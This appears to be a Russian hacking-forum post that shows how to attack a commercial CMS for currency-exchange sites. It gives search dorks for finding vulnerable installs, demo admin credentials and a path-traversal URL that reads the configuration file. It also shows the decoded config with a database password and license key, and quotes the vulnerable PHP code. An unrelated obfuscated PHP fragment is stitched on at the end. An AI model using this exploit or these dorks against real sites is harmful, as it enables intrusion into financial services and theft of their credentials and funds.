Сам проект по продаже CMS обменных пунктов: https://www.auto-exchanger.com демо проект: http://demo.auto-exchanger.com admin1:admin1 DORK: "inurl:?lang=english exchange" "inurl:nview.php?title=" експлоит: http://demo.auto-exchanger.com/admin/adm_template.php?id=../../configuration.php&Action=Edit PHP: <?php //0046aif(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the website operator. If you are the website operator please use the <a href="http://www.ioncube.com/lw/">ionCube Loader Wizard</a> to assist with installation.');exit(199);?>HR+cPo//f2S9/1kSBks7iYhltqWXx6IBc2Jq/CGUeTW2AXSd6dnn0KWJFT/OoPnfu6SeSmNtOct6fGyOtL0BJ2P/ULaZl+FMQPilWfpgS0mQjXsRxCrHQlndvGsGnokfzeekHFVlfVGALzUxTj1KZrWkkqRtCxv0iLjikLnjZk0j3PkJcMN59tET7LbF8DW1TPGwHFrNej37Ya+Z/Tf+VRn2OE5FtM7sNmVcIdt2/d734/xig87dLcYPkBCMEz4H0RBpCsqG9gKtVz9TtyfaylbSUTwuWaCdC33EplysQYTB4n8NLLdlPhpEE3azLNDvoC1dDPzuxAPZ5wGRv/iLwNhBE0sElp/fbNa5g2oen/suFMW7gXBTzcq2S8q+4QvT+88zS0kmYlQ7MRo9lsEY4+9XqMB9KDBEHfgWw6L1/+6RvE7q0Mpw1/EMDbkKfv7HxsK1Inzi1QPD9F8AOTMw72FveCLyAg5NvKGOpPurTG+3EDfOXlnfNV8sG6lZ4weRrDAY1rYIhsDDQi2C5+kZKvtt8kdd6pIPuiFB+1DqLcNF6H7a3e9vqruseuS78BHKEGVRE5GZ6cbseqf1ak4RqOOrzC/VQPGe7hSodQTWqwVersQDRwDgpS4TUEcr7hLg7Hkb5POSPwIqi64Svz3pxlUNCL1SLEi5JKfIHz77/uKeZ94RLSHon7b+SubIH1nFAxLcPMT98nV1mXPgIuX62E1m5J5z1iduEkszPnArKbwX9GZSXIZpdWNoKku0yb7a+sDjIstt2wjBb/YRFMEiJ/x4WgqcJxw2oLgXjHOdVOmd6YFjuKxJ9IajgNE/FJfkr1nJYnY6XtixJbDIFvfiT8LhsGCF6hRrfVNDHAS= декриптуем на сайте: https://idecode.eu/decoder PHP: <?php/***--- IonCube v8.3.0.0 Loader By iDecode--- PHP 5.3--- Decoder version : 1.0.0.0--- Author : iDecode--- Release on : 01.02.2015--- Website : http://iDecode.eu***/ $hostname = 'localhost'; $database = 'autoexer_demo'; $db_login = 'autoexer_demouse'; $db_encode = false; $db_pass = 'rA&dPPwC492n!A'; $db_prefix = 'demo_'; $license = '7F407768525F776265507C0A521A6975027A0C25441C11'; // This is the demo version. This version only decode 30 lines. Уязвимый участок кода в файле adm_template.php: Code: ... $Oid = $_GET['id']; ... if ( $_GET['Action'] == "Edit" ) { $filename = realpath( $CONFIG['SKIN_FOLDER'].$Oid ); if ( !is_writable( $filename ) ) { $Error[] = $Oid." is not writable, you need to update permission if you want to edit template file from here."; } if ( !file_exists( $filename ) ) { $Error[] = $Oid." is does not exist."; } if ( !$Error ) { $body = file_get_contents( $filename ); } } Вот такие безопасные бывают CMS на обменных пунктах. P.S: "Храните ваши деньги в сберегательных кассах!"
kindly decode this md5 <?php $lFyE=""; $UW='ejup'.'fa6w'.'vgnoq'.'dyhstx'.'birkz'.'c%4_l'.'m'; $KQiR=fL1zG();
